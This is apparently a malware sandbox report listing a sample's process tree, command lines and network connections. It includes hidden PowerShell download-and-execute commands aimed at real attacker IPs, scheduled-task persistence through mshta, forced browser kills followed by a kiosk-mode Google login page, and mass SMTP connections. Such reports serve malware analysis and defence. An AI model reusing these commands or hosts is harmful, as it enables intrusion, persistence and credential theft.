PID 1224 wrote to memory of 2836 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 2836 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1224 wrote to memory of 2836 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 296 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 296 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 296 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 296 wrote to memory of 2684 N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
PID 2728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2728 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 2900 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2900 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2900 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2900 wrote to memory of 1808 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2900 wrote to memory of 2960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2900 wrote to memory of 2960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2900 wrote to memory of 2960 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe

"C:\Users\Admin\AppData\Local\Temp\JI3NRX1KNLRKORIZC.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9D29.tmp\9D2A.tmp\9D2B.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\b7ef68053e.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn YoRTsmaxx5v /tr "mshta C:\Users\Admin\AppData\Local\Temp\RZwmuUGVZ.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'AFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE

"C:\Users\Admin\AppData\Local\TempAFEJAHTKFNIDCVLIXWUNAO7YTG6MNSAQ.EXE"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "KuBZrmaKyUJ" /tr "mshta \"C:\Temp\VNx3gTICP.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\VNx3gTICP.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe

"C:\Users\Admin\AppData\Local\Temp\10109090101\3940014ab5.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\d116733c4e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2112 -s 508

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 1020

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe

"C:\Users\Admin\AppData\Local\Temp\10109110101\697c56b4fd.exe"

C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe

"C:\Users\Admin\AppData\Local\Temp\10109120101\ca0c233e68.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {39E3C316-04D7-43F7-8E3A-F5C9C00AD883} S-1-5-21-2703099537-420551529-3771253338-1000:XECUDNCD\Admin:Interactive:[1]

C:\ProgramData\rbkvgg\bdhx.exe

C:\ProgramData\rbkvgg\bdhx.exe

C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe

"C:\Users\Admin\AppData\Local\Temp\10109130101\dc32b0ba15.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 1204

C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe

"C:\Users\Admin\AppData\Local\Temp\10109140101\765aeb8838.exe"

C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe

"C:\Users\Admin\AppData\Local\Temp\10109150101\151fdd87ae.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.0.1404389395\1587828078" -parentBuildID 20221007134813 -prefsHandle 1252 -prefMapHandle 1244 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b681ec8d-5d35-487d-8b3e-c7bb73e798bb} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1352 101d8c58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.1.1074487475\2015986347" -parentBuildID 20221007134813 -prefsHandle 1532 -prefMapHandle 1512 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8f1d330-493f-4204-865d-da67d0e22595} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 1544 eeeb258 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.2.122218642\1120858895" -childID 1 -isForBrowser -prefsHandle 1988 -prefMapHandle 1984 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a181cd1-bc5b-461d-b6bb-1934de5fb0e0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2000 19f72158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.3.258885724\1036051148" -childID 2 -isForBrowser -prefsHandle 2756 -prefMapHandle 2752 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0887fe63-5db0-427d-9249-418af38093f7} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 2768 1b31bd58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.4.783715881\1406145648" -childID 3 -isForBrowser -prefsHandle 3868 -prefMapHandle 3864 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {157a3b0f-d809-4fad-9176-d73dc0da1f4d} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3880 207da558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.5.1641785714\443642166" -childID 4 -isForBrowser -prefsHandle 3988 -prefMapHandle 3992 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {753f3ee8-a3e6-4ddb-8e77-4a5ec56d69a5} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 3976 207dba58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2416.6.300588055\2014769721" -childID 5 -isForBrowser -prefsHandle 4192 -prefMapHandle 4196 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 608 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78747322-58cb-47c8-ae37-fd689bb247b0} 2416 "\\.\pipe\gecko-crash-server-pipe.2416" 4180 1f641a58 tab

C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe

"C:\Users\Admin\AppData\Local\Temp\10109160101\ac8277ecde.exe"

C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 500

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
LU 45.59.120.8:80 45.59.120.8 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.80.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.96.1:443 croprojegies.run tcp
RU 176.113.115.7:80 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:49692 tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 216.58.204.78:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 216.58.204.78:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
GB 216.58.213.14:443 consent.youtube.com udp
N/A 127.0.0.1:49699 tcp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
US 213.209.150.137:4000 towerbingobongoboom.com tcp
US 213.209.150.137:4086 towerbingobongoboom.com tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigzrn76.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigzrn76.gvt1.com udp
GB 173.194.137.73:443 r4.sn-aigzrn76.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigzrn76.gvt1.com udp
GB 173.194.137.73:443 r4.sn-aigzrn76.gvt1.com udp
US 8.8.8.8:53 mail.rravena.k12.ne.us udp
US 8.8.8.8:53 poczta.pl udp
US 8.8.8.8:53 mail.educacion.cajasan.com udp
US 8.8.8.8:53 mail.sess-equipment.com udp
US 8.8.8.8:53 secure.cegi.de udp
US 8.8.8.8:53 out.reecorp.com udp
US 8.8.8.8:53 alt4.aspmx.l.google.com udp
US 8.8.8.8:53 mx2.telenet-ops.be udp
BE 195.130.132.9:587 mx2.telenet-ops.be tcp
TW 142.250.157.26:587 alt4.aspmx.l.google.com tcp
PL 194.181.93.175:587 poczta.pl tcp
US 8.8.8.8:53 ASPMX.L.GOOGLE.COM udp
NL 142.250.27.27:465 ASPMX.L.GOOGLE.COM tcp
US 216.21.224.199:465 mail.sess-equipment.com tcp
US 8.8.8.8:53 out.sensis.ro udp
US 8.8.8.8:53 bbox.fr udp
US 8.8.8.8:53 gamil.com udp
US 8.8.8.8:53 smtp.garudapower.com.partial udp
US 8.8.8.8:53 mail.centralpetvet.com udp
US 192.252.154.117:587 gamil.com tcp
US 8.8.8.8:53 mx2.hc4144-24.iphmx.com udp
US 8.8.8.8:53 out.edition-cobra.fr udp
US 68.232.130.252:465 mx2.hc4144-24.iphmx.com tcp
US 198.0.171.177:465 mail.centralpetvet.com tcp
US 8.8.8.8:53 mail.technologist.com udp
US 8.8.8.8:53 mail.forumaccess.com.br udp
US 204.74.99.100:587 mail.technologist.com tcp
US 8.8.8.8:53 spi-chim.u-3mrs.fr udp
US 8.8.8.8:53 ztrbb.de udp
FI 65.109.49.216:587 ztrbb.de tcp
FR 194.167.229.69:587 spi-chim.u-3mrs.fr tcp
US 8.8.8.8:53 fedex.com udp
US 8.8.8.8:53 secure.yalla.net udp
US 8.8.8.8:53 smtp.yazoo.co.uk udp
US 8.8.8.8:53 secure.outolook.com udp
US 170.170.195.98:587 fedex.com tcp
FR 134.119.176.29:465 secure.outolook.com tcp
US 8.8.8.8:53 out.poczta.neostrada.pl udp
US 8.8.8.8:53 out.resourcedevelopment.net udp
US 8.8.8.8:53 uni-mainz.de udp
DE 134.93.178.31:465 uni-mainz.de tcp
US 8.8.8.8:53 mail.skole.hr udp
US 8.8.8.8:53 secure.mywdo.com udp
US 8.8.8.8:53 bolt.eu udp
US 8.8.8.8:53 seznam.cz udp
CZ 77.75.79.222:587 seznam.cz tcp
GB 18.172.88.32:465 bolt.eu tcp
US 209.17.116.163:465 out.resourcedevelopment.net tcp
US 8.8.8.8:53 secure.ac-versailles.fr udp
US 8.8.8.8:53 q.com udp
US 8.8.8.8:53 amber.mobily.com.sa udp
AU 45.154.183.183:587 q.com tcp
US 8.8.8.8:53 smtp.comcast.net udp
US 8.8.8.8:53 xplannersr.com udp
US 96.102.167.164:587 smtp.comcast.net tcp
SA 84.23.107.229:587 amber.mobily.com.sa tcp
US 8.8.8.8:53 eforward2.registrar-servers.com udp
US 8.8.8.8:53 smtp.iinet.net.au udp
US 8.8.8.8:53 mail.avto-bezlaj.si udp
US 8.8.8.8:53 earthlink.net udp
US 8.8.8.8:53 gorge-net.mx.av-mx.com udp
CZ 77.75.79.222:587 seznam.cz tcp
US 162.255.118.52:587 eforward2.registrar-servers.com tcp
AU 52.62.236.135:587 smtp.iinet.net.au tcp
US 150.136.204.204:587 gorge-net.mx.av-mx.com tcp
US 104.19.239.228:587 earthlink.net tcp
SI 185.69.149.131:587 mail.avto-bezlaj.si tcp
US 8.8.8.8:53 secure.dudley.gov.uk udp
US 8.8.8.8:53 mmc-co-za.mail.protection.outlook.com udp
US 8.8.8.8:53 lans.gov.la udp
US 8.8.8.8:53 secure.bearschare.fr udp
US 8.8.8.8:53 ALT3.ASPMX.L.GOOGLE.COM udp
US 8.8.8.8:53 mail.ziggo.nl udp
SG 74.125.200.27:465 ALT3.ASPMX.L.GOOGLE.COM tcp
IE 52.101.68.36:587 mmc-co-za.mail.protection.outlook.com tcp
US 96.102.167.164:587 smtp.comcast.net tcp
US 8.8.8.8:53 tele2.it udp
US 8.8.8.8:53 planet.nl udp
US 8.8.8.8:53 optonline.net udp
US 167.206.148.154:587 optonline.net tcp
IE 52.18.216.171:587 planet.nl tcp
US 8.8.8.8:53 out.avenuelitho.com udp
US 8.8.8.8:53 smtp.interfree.it udp
US 8.8.8.8:53 securesmtp.pelung.com udp
US 8.8.8.8:53 janca.de udp
US 8.8.8.8:53 yaoo.com udp
US 8.8.8.8:53 hcwainwright.com udp
CZ 77.75.79.222:587 seznam.cz tcp
DE 81.169.145.163:587 janca.de tcp
IT 80.91.55.62:587 smtp.interfree.it tcp
US 13.248.158.7:587 yaoo.com tcp
US 8.8.8.8:53 secure.wehrhahn-verlag.de udp
US 8.8.8.8:53 basaltosc.com.br udp
US 8.8.8.8:53 smtp.student.newton.k12.in.us udp
US 8.8.8.8:53 mail.isaacjoe.plus.com udp
US 8.8.8.8:53 smtp.horngroup.com udp
US 69.164.193.148:587 hcwainwright.com tcp
HR 193.198.252.97:587 mail.skole.hr tcp
CZ 77.75.79.222:587 seznam.cz tcp
US 8.8.8.8:53 securesmtp.copinaval.com udp
US 8.8.8.8:53 smtp.campus.fct.unl.pt udp
US 8.8.8.8:53 smtp.ap.senai.br udp
US 8.8.8.8:53 secure.outdrs.net udp
US 96.102.167.164:587 smtp.comcast.net tcp
US 8.8.8.8:53 securesmtp.pchigh.k12.hi.us udp
CZ 77.75.79.222:587 seznam.cz tcp
US 8.8.8.8:53 smtp.vodafone.de udp
US 8.8.8.8:53 angel-cakes.net udp
US 8.8.8.8:53 mail1.qlc.co.in udp
BR 177.20.224.233:465 basaltosc.com.br tcp
DE 151.189.176.206:587 smtp.vodafone.de tcp
US 8.8.8.8:53 mail3.o.check24.de udp
US 8.8.8.8:53 ab-concept.eu udp
US 8.8.8.8:53 voila.fr udp
US 8.8.8.8:53 mx01.hornetsecurity.com udp
DE 46.30.5.170:587 mail3.o.check24.de tcp
DE 94.100.132.8:587 mx01.hornetsecurity.com tcp
IE 3.5.70.34:587 voila.fr tcp
DE 85.13.161.81:587 ab-concept.eu tcp
US 8.8.8.8:53 smtp.virgilio.it udp
US 8.8.8.8:53 azet.sk udp
NL 84.116.6.3:587 mail.ziggo.nl tcp
US 8.8.8.8:53 securesmtp.pandacomdirekt.de udp
US 96.102.167.164:587 smtp.comcast.net tcp
NL 142.250.27.27:587 ASPMX.L.GOOGLE.COM tcp
US 8.8.8.8:53 mx04.st-andrews.ac.uk udp
US 8.8.8.8:53 secure.cabovisao.pt udp
US 8.8.8.8:53 ridesmtaext02.roche.com udp
US 8.8.8.8:53 secure.dormilandia.com.co udp
US 96.102.167.164:587 smtp.comcast.net tcp
US 8.8.8.8:53 secure.optononline.net udp
US 8.8.8.8:53 nsty.in udp
US 8.8.8.8:53 secure.llaut.org udp
US 198.21.25.78:587 ridesmtaext02.roche.com tcp
GB 138.251.7.124:587 mx04.st-andrews.ac.uk tcp
NL 95.211.75.26:587 secure.optononline.net tcp
CZ 77.75.79.222:587 seznam.cz tcp
US 96.102.167.164:587 smtp.comcast.net tcp
US 8.8.8.8:53 smtp.veratour.it udp
US 8.8.8.8:53 smtp.cquel.com udp
US 8.8.8.8:53 intmarktech-com.mail.protection.outlook.com udp
US 8.8.8.8:53 secure.jasonfitzsimmons.com.au udp
US 52.101.42.4:465 intmarktech-com.mail.protection.outlook.com tcp
US 8.8.8.8:53 gmbol.cem udp
US 8.8.8.8:53 out.corketb.ie udp
US 8.8.8.8:53 secure.ofita.net udp
US 8.8.8.8:53 eju.u-beurgegze.fr udp
US 8.8.8.8:53 hellwegen-holtzhausen.de udp
US 8.8.8.8:53 secure.ingo.ua udp
DE 49.13.50.5:465 hellwegen-holtzhausen.de tcp
US 8.8.8.8:53 mail.stagingspace.co.uk udp
US 8.8.8.8:53 smtp.blome-darfeld.de udp
US 8.8.8.8:53 smtp.urugged.fr udp
US 8.8.8.8:53 securesmtp.lujasobo.prochowice.pl udp
US 8.8.8.8:53 out.guruku.id udp
IN 103.19.136.7:465 mail1.qlc.co.in tcp
US 8.8.8.8:53 ggtsrl-it.mail.protection.outlook.com udp
CZ 77.75.79.222:587 seznam.cz tcp
US 8.8.8.8:53 securesmtp.cleantech.com udp
US 96.102.167.164:587 smtp.comcast.net tcp
IE 52.101.68.18:465 ggtsrl-it.mail.protection.outlook.com tcp
US 96.102.167.164:587 smtp.comcast.net tcp
